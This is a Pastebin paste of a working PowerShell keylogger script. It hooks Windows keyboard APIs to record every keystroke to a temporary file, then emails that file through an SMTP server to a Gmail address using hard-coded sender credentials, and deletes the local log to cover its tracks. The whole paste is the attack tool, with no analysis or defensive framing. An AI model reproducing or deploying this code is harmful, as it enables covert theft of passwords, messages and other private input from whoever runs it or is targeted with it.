gkseldridge

Untitled

Nov 15th, 2019
114
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Edit only this section!
  2. $TimesToRun = 1
  3. $RunTimeP = 2
  4. $From = "billyj@usa.com"
  5. $Pass = "cheese123"
  6. $To = "gkseldridge@gmail.com"
  7. $Subject = "Keylogger Results"
  8. $body = "Keylogger Results"
  9. $SMTPServer = "smtp.mail.com"
  10. $SMTPPort = "587"
  11. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
  12. ############################
  13.  
  14.  
  15. $TimeStart = Get-Date
  16. $TimeEnd = $timeStart.addminutes($RunTimeP)
  17.  
  18. #requires -Version 2
  19. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  20. {
  21. # Signatures for API Calls
  22. $signatures = @'
  23. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  24. public static extern short GetAsyncKeyState(int virtualKeyCode);
  25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  26. public static extern int GetKeyboardState(byte[] keystate);
  27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  28. public static extern int MapVirtualKey(uint uCode, int uMapType);
  29. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  30. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  31. '@
  32.  
  33. # load signatures and make members available
  34. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  35.  
  36. # create output file
  37. $null = New-Item -Path $Path -ItemType File -Force
  38.  
  39. try
  40. {
  41.  
  42. # create endless loop. When user presses CTRL+C, finally-block
  43. # executes and shows the collected key presses
  44. $Runner = 0
  45. while ($TimesToRun -ge $Runner) {
  46. while ($TimeEnd -ge $TimeNow) {
  47. Start-Sleep -Milliseconds 40
  48.  
  49. # scan all ASCII codes above 8
  50. for ($ascii = 9; $ascii -le 254; $ascii++) {
  51. # get current key state
  52. $state = $API::GetAsyncKeyState($ascii)
  53.  
  54. # is key pressed?
  55. if ($state -eq -32767) {
  56. $null = [console]::CapsLock
  57.  
  58. # translate scan code to real code
  59. $virtualKey = $API::MapVirtualKey($ascii, 3)
  60.  
  61. # get keyboard state for virtual keys
  62. $kbstate = New-Object Byte[] 256
  63. $checkkbstate = $API::GetKeyboardState($kbstate)
  64.  
  65. # prepare a StringBuilder to receive input key
  66. $mychar = New-Object -TypeName System.Text.StringBuilder
  67.  
  68. # translate virtual key
  69. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  70.  
  71. if ($success)
  72. {
  73. # add key to logger file
  74. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  75. }
  76. }
  77. }
  78. $TimeNow = Get-Date
  79. }
  80. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
  81. Remove-Item -Path $Path -force
  82. }
  83. }
  84. finally
  85. {
  86. # open logger file in Notepad
  87. exit 1
  88. }
  89. }
  90.  
  91. # records all key presses until script is aborted by pressing CTRL+C
  92. # will then open the file with collected key codes
  93. Start-KeyLogger
RAW Paste Data